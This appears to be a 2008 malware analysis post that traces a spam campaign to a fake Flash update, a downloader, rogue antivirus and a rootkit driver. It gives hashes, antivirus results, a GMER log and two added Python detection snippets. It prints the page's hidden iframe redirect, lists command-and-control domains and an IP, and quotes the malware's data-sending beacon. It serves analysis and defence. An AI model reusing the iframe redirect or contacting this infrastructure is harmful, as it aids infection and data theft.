Commonly referred to as Trojan-Downloader.Win32.Exchanger, this huge spam campaign has been going on for months now and it's getting worse every day.
Some background details. The topics below are linked to the same spam campaign. Nov 22 2007, first sample on B.I.S.S.

The variety of subjects in the emails guarantees a high impact, since we find news headlines based on recent events, free videos / pictures of stars, songs, orders and even failure notices ... Below are a few samples of today's harvest.

Subject: Presentation shocking for [username]
Body: Veronika Zemanova Shocking sexy songs

Subject: IBM to file for bankruptcy
Body: Bill Clinton finds Hillary affair pics

Subject: Interesting - Beat 360 Caption Contest Video
Body: Watch >>>

Subject: Look mpeg4 Gallery
Body: Kylie Minogue Shocking mpeg4.

Subject: Your order is executed
Body: Cameron Diaz Nude - Free Video

Subject: China has more interet users than US
Body: Thailand decides to cut off economic exchanges with Cambodia, putting possibility of war on the table

Subject: Your order
Body: T!t$ Photo and Video Angel!na Jolie

Subject: Failure notice for Gabriel
Body: Nicole Kidman N@ked - Video, Pictures

Subject: Virgin Galactic shows off mothership space craft
Body: New laws legalize gun ownership for teenagers in US

Subject: Timberlake gay video
Body: Watch >>>

Some pages contain exploits and others don't; some lead to a direct download of CbEvtSvc.exe while others link directly to the first file downloaded by CbEvtSvc.exe (see 31scan2.exe - 6212533663.exe). Different methods, different files ... all have the same objective: get unwanted fraudware, mainly a fake / rogue antivirus, installed on your computer. Some go a lil' bit further ... which is the reason for this write-up, because we're talking rootkit now.

<h4>
The sample ...
</h4>
Today's mail will lead us to a site where we are prompted to install a Flash update.
The page contains an iframe.
CODE
<iframe id="ifid01" src="metai.html" frameborder="0" style="display:none"></iframe>
This iframe redirects us to 1.html, which contains a huge list of exploits as seen in the recent Storm variants, with the exception of the Baidu Bar.
  • The "usual suspects" ...
  • SuperBuddy ActiveX
  • NCTAudioFile2
  • GomWebCtrl.GomManager.1
  • RealPlayer
  • WebviewFolderIcon.WebviewFolderIcon.1
Details on those storm exploits can be found here.

The next stage consists of downloading get_flash_update.exe, which is saved as wXtwRzv.exe on our computer. Upon execution the file is copied to the %System% folder as CbEvtSvc.exe. A new service is created on our system, visible in HijackThis as follows.
O23 - Service: CbEvtSvc - Unknown owner - C:\WINDOWS\System32\CbEvtSvc.exe
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

After a couple of minutes internet access is requested by CbEvtSvc.exe. The established link is used to post information about OS version, geo location etc ... and to retrieve a list of files to download.
<h4>
31scan2.exe aka 6212533663.exe
</h4>
A first file called 31scan2.exe and saved as 6212533663.exe is downloaded and executed on the computer.
A quick check is done as it gathers information about the operating system, processor, installed programs, environment variables ... This file will download and install a fake / rogue antivirus on the computer.

<h4>
install.exe aka 728739263.exe
</h4>
A second file - install.exe - is downloaded and saved as 728739263.exe.
A randomly named kernel-mode driver is dropped and installed: %System%\drivers\ef9f7dfb.sys in my case.
A new memory page is created in the address space of %System%\services.exe.
Internet access is requested.
A DNS lookup is performed on the following domains. It also has the capability to send out email message(s) with its built-in SMTP client engine.
  • google.com
  • yahoo.com
  • aol.com
  • microsoft.com
Data is posted back to the following domains.
  • 208.72.168.191
  • davis-service.org
  • davis-service.asia
  • invtoworld.info
  • invtoworld.biz
  • satisfiedinvestors.com
CODE
POST /login.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 208.72.168.191
Content-Type: multipart/form-data
Content-Encoding: gzip
Content-Length: 96
~~~~~~~~~~: ~~~~~
Pragma: no-cache
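As an added example (not from the original post), a small Python check that parses a raw request like the one above and flags the traits of this check-in that a proxy or IDS rule could key on; the request text is constructed to mirror the quoted headers (redacted line left out, Accept list shortened), and the benign request is constructed for contrast.

```python
import ipaddress

# Constructed request mirroring the beacon shown above (not a capture from the page).
BEACON = (
    "POST /login.php HTTP/1.0\r\n"
    "Accept: image/gif, image/x-xbitmap, image/jpeg, application/msword, */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n"
    "Host: 208.72.168.191\r\n"
    "Content-Type: multipart/form-data\r\n"
    "Content-Encoding: gzip\r\n"
    "Content-Length: 96\r\n\r\n"
)
# Constructed ordinary browser form post, for contrast.
NORMAL = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko Firefox/3.0\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundaryXYZ\r\n"
    "Content-Length: 96\r\n\r\n"
)

def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers

def beacon_indicators(raw):
    """Return the anomalies in this request that distinguish it from a browser form post."""
    method, path, version, h = parse_request(raw)
    hits = []
    try:                                    # a real form post goes to a hostname, not a bare IP
        ipaddress.ip_address(h.get("host", ""))
        hits.append("Host is a bare IP address")
    except ValueError:
        pass
    if h.get("content-encoding", "").lower() == "gzip":
        hits.append("Content-Encoding: gzip on a client request (browsers do not gzip uploads)")
    ctype = h.get("content-type", "")
    if ctype.startswith("multipart/form-data") and "boundary=" not in ctype:
        hits.append("multipart/form-data without a boundary parameter")
    if method == "POST" and version == "HTTP/1.0" and "MSIE" in h.get("user-agent", ""):
        hits.append("HTTP/1.0 POST from a User-Agent claiming MSIE (IE 6 uses HTTP/1.1)")
    return hits
```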

<h4>
Rootkit scan (Simple Mode)
</h4>
QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-07-31 20:23:31
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwCreateEvent [0xF4509E31]
SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwCreateKey [0xF4508005]
SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwOpenKey [0xF45080B9]

---- Kernel code sections - GMER 1.0.14 ----

.text Beep.SYS F4500300 62 Bytes [ 51, 20, 50, 8B, 9A, E9, CA, ... ]
.text Beep.SYS F450033F 175 Bytes [ EE, C1, E7, 1F, E3, CA, 8E, ... ]
.text Beep.SYS F45003EF 120 Bytes [ 00, D5, 83, 7C, 57, 2E, EB, ... ]
.text Beep.SYS F4500468 55 Bytes [ 2F, 0C, 8A, AA, F0, FC, 7A, ... ]

---- Kernel IAT/EAT - GMER 1.0.14 ----

IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!MmLockPagableDataSection] 440FE103
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeCancelTimer] AC757514
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!MmUnlockPagableImageSection] 3F521D69
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoStartNextPacket] CF153B12
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeSetTimer] 6E77F35F
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!_allmul] 9CD540E0
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoStartPacket] 14A64865
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeInitializeEvent] 97C401FE
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeInitializeTimer] 0FD385FB
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeInitializeDpc] 70178DEC
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoCreateDevice] 2D0BF9A1
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!RtlInitUnicodeString] EB03682A
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoAcquireCancelSpinLock] F21F34D7
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeRemoveDeviceQueue] 389B6838
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeRemoveEntryDeviceQueue] 468E6D1D
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoReleaseCancelSpinLock] 29FB9996
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoDeleteDevice] 11D3DBF3
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IofCompleteRequest] 162D1BC4
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!ExReleaseFastMutex] 4534AA31
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!KfRaiseIrql] 63591AFA
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!KfLowerIrql] 927EF2E7
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!HalMakeBeep] 28FA5E88
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!ExAcquireFastMutex] 21EA7CAD

---- Devices - GMER 1.0.14 ----

Device \FileSystem\Ntfs \Ntfs Beep.SYS (BEEP Driver/Microsoft Corporation)

AttachedDevice \Driver\Tcpip \Device\Ip Beep.SYS (BEEP Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp Beep.SYS (BEEP Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp Beep.SYS (BEEP Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp Beep.SYS (BEEP Driver/Microsoft Corporation)

Device \Driver\SYMTDI \Device\SymTDI Beep.SYS (BEEP Driver/Microsoft Corporation)

---- Services - GMER 1.0.14 ----

Service System32\drivers\ef9f7dfb.sys (*** hidden *** ) [SYSTEM] ef9f7dfb

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@ImagePath \SystemRoot\System32\drivers\ef9f7dfb.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@Start 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@ErrorControl 1

---- EOF - GMER 1.0.14 ----
SymTDI is the Norton Internet Security filter driver; the rootkit attaches to it and so "intercepts" the firewall filtering.

Note: Beep.sys has NOT been replaced by the rootkit.
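As an added example (not part of the original post), a Python triage of a GMER Simple Mode log: it pulls out the SSDT hooks, the TDI attachments and the hidden service with its registry Type/Start values, and decodes them into the plain-language indicators discussed above; the log excerpt is constructed to mirror the quoted scan.

```python
import re

# Constructed excerpt in the layout of a GMER "Simple Mode" log, mirroring the
# findings quoted above; it is not the page's full log.
SAMPLE_LOG = r"""
SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwCreateEvent [0xF4509E31]
SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwOpenKey [0xF45080B9]
AttachedDevice \Driver\Tcpip \Device\Tcp Beep.SYS (BEEP Driver/Microsoft Corporation)
Service System32\drivers\ef9f7dfb.sys (*** hidden *** ) [SYSTEM] ef9f7dfb
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@Start 1
"""

SSDT_RE = re.compile(r"^SSDT\s+\S*\\(\S+)\s+\(.*?\)\s+(Zw\w+)\s+\[0x([0-9A-Fa-f]+)\]")
ATTACH_RE = re.compile(r"^AttachedDevice\s+(\S+)\s+(\S+)\s+(\S+)")
HIDDEN_RE = re.compile(r"^Service\s+(\S+)\s+\(\*\*\* hidden \*\*\* \)\s+\[(\w+)\]\s+(\w+)")
REG_RE = re.compile(r"^Reg\s+HKLM\\SYSTEM\\CurrentControlSet\\Services\\(\w+)@(Type|Start)\s+(\d+)")
# Service control manager meanings of the Type/Start registry values.
SERVICE_TYPE = {1: "SERVICE_KERNEL_DRIVER", 2: "SERVICE_FILE_SYSTEM_DRIVER", 16: "SERVICE_WIN32_OWN_PROCESS"}
SERVICE_START = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START", 3: "DEMAND_START", 4: "DISABLED"}

def triage(log):
    """Collect SSDT hooks, device attachments and hidden services from a GMER log."""
    hooks, attached, hidden = [], [], {}
    for line in log.splitlines():
        if m := SSDT_RE.match(line):
            hooks.append((m.group(2), m.group(1), int(m.group(3), 16)))   # (syscall, module, address)
        elif m := ATTACH_RE.match(line):
            attached.append((m.group(1), m.group(2), m.group(3)))        # (driver, device, module)
        elif m := HIDDEN_RE.match(line):
            hidden[m.group(3)] = {"path": m.group(1), "account": m.group(2)}
        elif (m := REG_RE.match(line)) and m.group(1) in hidden:
            hidden[m.group(1)][m.group(2)] = int(m.group(3))
    return hooks, attached, hidden

def verdict(hooks, attached, hidden):
    """Translate the parsed facts into the indicators a responder acts on."""
    notes = []
    for call, module, addr in hooks:
        if module.lower() == "beep.sys":   # the beep driver has no business owning a syscall entry
            notes.append(f"SSDT {call} -> {module} @0x{addr:08X}: hook attributed to an unlikely module")
    for driver, device, module in attached:
        if driver.lower() == r"\driver\tcpip":
            notes.append(f"{module} attached to {device}: traffic on that stack can be filtered or hidden")
    for name, info in hidden.items():
        kind = SERVICE_TYPE.get(info.get("Type"), "unknown type")
        start = SERVICE_START.get(info.get("Start"), "unknown start")
        notes.append(f"hidden service {name} ({info['path']}): {kind}, {start}")
    return notes
```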

<h4>
File details
</h4>
Filename: get_flash_update.exe

File size: 74752 bytes
MD5...: 57c23fe6897e77080eb610e89719522b
SHA1..: d64e1aba1264cc1c20d13d0f612c6cbf44bc18be
SHA256: 24d4df8ef81c55020d71e4e3bce900d4633a02fe07ed91c409875bbb394e5c4e
QUOTE
File get_flash_update.exe received on 07.31.2008 21:03:11 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 -
AntiVir 7.8.1.15 2008.07.31 TR/Dldr.Agent.yhp
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 -
AVG 8.0.0.156 2008.07.31 I-Worm/Nuwar.W
BitDefender 7.2 2008.07.31 -
CAT-QuickHeal 9.50 2008.07.31 TrojanDownloader.Agent.yhp
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 Trojan.DownLoad.3252
eSafe 7.0.17.0 2008.07.29 Suspicious File
eTrust-Vet 31.6.5997 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 -
F-Secure 7.60.13501.0 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
Fortinet 3.14.0.0 2008.07.31 -
GData 2.0.7306.1023 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
Ikarus T3.1.1.34.0 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
Kaspersky 7.0.0.125 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
McAfee 5351 2008.07.31 -
Microsoft 1.3704 2008.07.28 -
NOD32v2 3315 2008.07.31 -
Norman 5.80.02 2008.07.31 W32/Tibs.CQFT
Panda 9.0.0.4 2008.07.31 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.07.31 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.07.31 Mal/EncPk-DA
Sunbelt 3.1.1537.1 2008.07.29 -
Symantec 10 2008.07.31 Trojan.Erotpics
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 Possible_Nucrp-6
VBA32 3.12.8.1 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 Spyware.Agent.Do.74752.A
VirusBuster 4.5.11.0 2008.07.31 Trojan.DL.Exchanger.BR
Webwasher-Gateway 6.6.2 2008.07.31 Trojan.Dldr.Agent.yhp
______________________________

Filename: 31scan2.exe - 6212533663.exe

File size: 110080 bytes
MD5...: 627c1008e2f1f849160c9d58e238f080
SHA1..: 4ae33ad5a2095d31901b134eaab91f51568e3d60
SHA256: cc8847efd781a53d24f77fe3d2a1931ae3e0ca749d63fd93b8ece1a7b7955da0
QUOTE
File 31scan2.exe received on 07.31.2008 21:05:46 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 -
AntiVir 7.8.1.15 2008.07.31 HEUR/Crypted
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 -
AVG 8.0.0.156 2008.07.31 Downloader.FraudLoad.A
BitDefender 7.2 2008.07.31 -
CAT-QuickHeal 9.50 2008.07.31 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 -
eSafe 7.0.17.0 2008.07.29 Suspicious File
eTrust-Vet 31.6.5997 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 W32/Zhelatin.O.gen!Eldorado
F-Secure 7.60.13501.0 2008.07.31 -
Fortinet 3.14.0.0 2008.07.31 -
GData 2.0.7306.1023 2008.07.31 -
Ikarus T3.1.1.34.0 2008.07.31 -
Kaspersky 7.0.0.125 2008.07.31 -
McAfee 5351 2008.07.31 FakeAlert-AG.gen
Microsoft 1.3704 2008.07.28 -
NOD32v2 3315 2008.07.31 Win32/TrojanDownloader.Agent.OBK
Norman 5.80.02 2008.07.31 -
Panda 9.0.0.4 2008.07.31 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.07.31 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.07.31 Mal/TibsPk-D
Sunbelt 3.1.1537.1 2008.07.29 -
Symantec 10 2008.07.31 -
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 -
VBA32 3.12.8.1 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 -
VirusBuster 4.5.11.0 2008.07.31 -
Webwasher-Gateway 6.6.2 2008.07.31 Heuristic.Crypted
______________________________

Filename: install.exe - 728739263.exe

This is the rootkit installer ... an improved detection is really needed, especially when looking at the Adware.AntivirXP08 detection made by ViRobot.

File size: 137216 bytes
MD5...: 831e11da49fee6b692d009b8f71822cf
SHA1..: 8d67c41fdf68dcff9d8a63caaba3a427399205f8
SHA256: 606e20d2f02da5732a8332c1271c8e503567f4e98889af29c287e0a0e8070b53
PEiD..: - UPX 2.90 [LZMA]
QUOTE
File install.exe received on 07.31.2008 21:06:48 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 -
AntiVir 7.8.1.15 2008.07.31 TR/Agent.137216.2.A
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 Win32:Trojan-gen {Other}
AVG 8.0.0.156 2008.07.31 SHeur.BYGH
BitDefender 7.2 2008.07.31 -
CAT-QuickHeal 9.50 2008.07.31 -
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 -
eSafe 7.0.17.0 2008.07.29 Suspicious File
eTrust-Vet 31.6.5997 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 -
F-Secure 7.60.13501.0 2008.07.31 -
Fortinet 3.14.0.0 2008.07.31 W32/MUTANT.EW!tr
GData 2.0.7306.1023 2008.07.31 Win32:Trojan-gen
Ikarus T3.1.1.34.0 2008.07.31 Virus.Win32.Trojan
Kaspersky 7.0.0.125 2008.07.31 -
McAfee 5351 2008.07.31 -
Microsoft 1.3704 2008.07.28 -
NOD32v2 3315 2008.07.31 -
Norman 5.80.02 2008.07.31 -
Panda 9.0.0.4 2008.07.31 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.07.31 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.07.31 -
Sunbelt 3.1.1537.1 2008.07.29 -
Symantec 10 2008.07.31 -
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 TROJ_MUTANT.EW
VBA32 3.12.8.1 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 Adware.AntivirXP08.R.137216
VirusBuster 4.5.11.0 2008.07.31 -
Webwasher-Gateway 6.6.2 2008.07.31 Trojan.Agent.137216.2.A
______________________________

Filename: ef9f7dfb.sys

File size: 109762 bytes
MD5...: fc5be1b115c13c707ad8f33d8411be51
SHA1..: d4aeecdd0943c91d7e1c08b6f5f796202a6c4a36
PEiD..: -
QUOTE
File ef9f7dfb.sys received on 08.01.2008 02:19:33 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 Win-Trojan/Rootkit.109762
AntiVir 7.8.1.15 2008.07.31 -
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 -
AVG 8.0.0.156 2008.07.31 I-Worm/Nuwar.W
BitDefender 7.2 2008.08.01 Trojan.Rootkit.Rustock.E
CAT-QuickHeal 9.50 2008.07.31 -
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 -
eSafe 7.0.17.0 2008.07.29 -
eTrust-Vet 31.6.5999 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 -
F-Secure 7.60.13501.0 2008.08.01 Trojan.Win32.Multis.cp
Fortinet 3.14.0.0 2008.07.31 W32/Tibs
GData 2.0.7306.1023 2008.07.31 Trojan.Win32.Multis.cp
Ikarus T3.1.1.34.0 2008.08.01 Virus.Trojan.Win32.Multis.cp
Kaspersky 7.0.0.125 2008.08.01 Trojan.Win32.Multis.cp
McAfee 5351 2008.07.31 W32/Nuwar.sys
Microsoft 1.3704 2008.07.28 -
NOD32v2 3316 2008.07.31 Win32/Rustock.NFW
Norman 5.80.02 2008.07.31 -
Panda 9.0.0.4 2008.08.01 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.08.01 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.08.01 Troj/NtRootK-DS
Sunbelt 3.1.1537.1 2008.08.01 Backdoor.Rustock
Symantec 10 2008.08.01 Hacktool.Rootkit
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 -
VBA32 3.12.8.2 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 -
VirusBuster 4.5.11.0 2008.07.31 -
Webwasher-Gateway 6.6.2 2008.07.31 -